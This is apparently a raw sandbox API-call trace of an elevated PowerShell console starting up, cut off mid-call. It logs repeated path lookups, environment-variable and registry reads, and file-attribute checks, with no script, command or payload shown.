lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2ce7dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.947] GetLastError () returned 0x7a [0051.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2ce78c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.947] GetLastError () returned 0x7a [0051.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2ce78c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.947] GetLastError () returned 0x7a [0051.950] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0051.951] GetLastError () returned 0x7a [0051.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2ce814, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.951] GetLastError () returned 0x7a [0051.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2ce7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.951] GetLastError () returned 0x7a [0051.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2ce7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.951] GetLastError () returned 0x7a [0051.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2ce7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.951] GetLastError () returned 0x7a [0051.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2ce814, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.984] GetLastError () returned 0x7a [0051.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2ce7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.984] GetLastError () returned 0x7a [0051.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2ce7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.984] GetLastError () returned 0x7a [0051.985] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2ce814, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.985] GetLastError () returned 0x7a [0051.985] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2ce7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.985] GetLastError () returned 0x7a [0051.985] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2ce7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.985] GetLastError () returned 0x7a [0051.985] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2ce828, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.985] GetLastError () returned 0x7a [0051.985] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2ce7d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.985] GetLastError () returned 0x7a [0051.986] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2ce7d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.986] GetLastError () returned 0x7a [0051.986] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2ce7d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0051.986] GetLastError () returned 0x7a [0052.038] SetConsoleCtrlHandler (HandlerRoutine=0x296384a, Add=1) returned 1 [0052.038] GetLastError () returned 0x7a [0053.369] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x338 [0053.369] GetLastError () returned 0x0 [0053.371] CoCreateGuid (in: pguid=0x2ced08 | out: pguid=0x2ced08*(Data1=0xa0a9ff59, Data2=0xc817, Data3=0x438f, Data4=([0]=0x86, [1]=0xd6, [2]=0x6c, [3]=0xdc, [4]=0xae, [5]=0xaf, [6]=0x86, [7]=0x88))) returned 0x0 [0053.403] WinSqmIsOptedIn () returned 0x0 [0053.403] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.403] GetLastError () returned 0xcb [0053.406] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.406] GetLastError () returned 0xcb [0053.406] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.406] GetLastError () returned 0xcb [0053.406] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.406] GetLastError () returned 0xcb [0053.407] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.407] GetLastError () returned 0xcb [0053.408] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.408] GetLastError () returned 0xcb [0053.408] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.408] GetLastError () returned 0xcb [0053.408] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.408] GetLastError () returned 0xcb [0053.412] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.412] GetLastError () returned 0xcb [0053.427] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.427] GetLastError () returned 0xcb [0053.430] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.430] GetLastError () returned 0xcb [0053.430] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.430] GetLastError () returned 0xcb [0053.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.689] GetLastError () returned 0xcb [0053.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.689] GetLastError () returned 0xcb [0053.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.689] GetLastError () returned 0xcb [0053.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.690] GetLastError () returned 0xcb [0053.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.740] GetLastError () returned 0x3 [0053.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.740] GetLastError () returned 0x3 [0053.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.741] GetLastError () returned 0x3 [0053.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.741] GetLastError () returned 0x3 [0053.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.741] GetLastError () returned 0x3 [0053.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.741] GetLastError () returned 0x3 [0053.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.741] GetLastError () returned 0x3 [0053.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.741] GetLastError () returned 0x3 [0053.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.741] GetLastError () returned 0x3 [0053.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.741] GetLastError () returned 0x3 [0053.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.741] GetLastError () returned 0x3 [0053.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.741] GetLastError () returned 0x3 [0053.743] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33 [0053.743] GetLastError () returned 0x3 [0053.746] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x3b8428, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0053.746] GetLastError () returned 0x3 [0053.746] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ceb20 | out: phkResult=0x2ceb20*=0x344) returned 0x0 [0053.746] RegQueryValueExW (in: hKey=0x344, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x2ceb64, lpData=0x0, lpcbData=0x2ceb60*=0x0 | out: lpType=0x2ceb64*=0x2, lpData=0x0, lpcbData=0x2ceb60*=0x6c) returned 0x0 [0053.747] RegQueryValueExW (in: hKey=0x344, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x2ceb64, lpData=0x3b8428, lpcbData=0x2ceb60*=0x6c | out: lpType=0x2ceb64*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x2ceb60*=0x6c) returned 0x0 [0053.747] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x3b8428, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb [0053.748] GetLastError () returned 0x3 [0053.748] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x3b8428, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0053.748] GetLastError () returned 0x3 [0053.760] RegCloseKey (hKey=0x344) returned 0x0 [0053.760] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x3b8428, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0053.760] GetLastError () returned 0x3 [0053.761] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ceb20 | out: phkResult=0x2ceb20*=0x344) returned 0x0 [0053.761] RegQueryValueExW (in: hKey=0x344, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x2ceb64, lpData=0x0, lpcbData=0x2ceb60*=0x0 | out: lpType=0x2ceb64*=0x0, lpData=0x0, lpcbData=0x2ceb60*=0x0) returned 0x2 [0053.761] RegCloseKey (hKey=0x344) returned 0x0 [0053.774] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3b8428 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0 [0053.775] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x2ce688, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27 [0053.775] GetLastError () returned 0x3f0 [0053.777] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1 [0053.777] GetLastError () returned 0x3f0 [0053.791] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ceaa0 | out: phkResult=0x2ceaa0*=0x34c) returned 0x0 [0053.793] RegQueryValueExW (in: hKey=0x34c, lpValueName="path", lpReserved=0x0, lpType=0x2ceb08, lpData=0x0, lpcbData=0x2ceb04*=0x0 | out: lpType=0x2ceb08*=0x1, lpData=0x0, lpcbData=0x2ceb04*=0x74) returned 0x0 [0053.793] RegQueryValueExW (in: hKey=0x34c, lpValueName="path", lpReserved=0x0, lpType=0x2ceae8, lpData=0x0, lpcbData=0x2ceae4*=0x0 | out: lpType=0x2ceae8*=0x1, lpData=0x0, lpcbData=0x2ceae4*=0x74) returned 0x0 [0053.793] RegQueryValueExW (in: hKey=0x34c, lpValueName="path", lpReserved=0x0, lpType=0x2ceae8, lpData=0x3b8428, lpcbData=0x2ceae4*=0x74 | out: lpType=0x2ceae8*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x2ceae4*=0x74) returned 0x0 [0053.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x2ce668, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0053.793] GetLastError () returned 0xcb [0053.793] SetErrorMode (uMode=0x1) returned 0x1 [0053.793] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x2ceae8 | out: lpFileInformation=0x2ceae8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0053.793] GetLastError () returned 0xcb [0053.793] SetErrorMode (uMode=0x1) returned 0x1 [0053.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce65c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0053.794] GetLastError () returned 0xcb [0053.794] SetErrorMode (uMode=0x1) returned 0x1 [0053.794] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2ceadc | out: lpFileInformation=0x2ceadc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0053.797] GetLastError () returned 0xcb [0053.797] SetErrorMode (uMode=0x1) returned 0x1 [0053.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce65c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0053.797] GetLastError () returned 0xcb [0053.797] SetErrorMode (uMode=0x1) returned 0x1 [0053.797] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2ceadc | out: lpFileInformation=0x2ceadc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0053.798] GetLastError () returned 0xcb [0053.798] SetErrorMode (uMode=0x1) returned 0x1 [0053.800] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.800] GetLastError () returned 0xcb [0053.801] GetACP () returned 0x4e4 [0053.811] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce4ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0053.811] GetLastError () returned 0x0 [0053.811] SetErrorMode (uMode=0x1) returned 0x1 [0053.813] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: 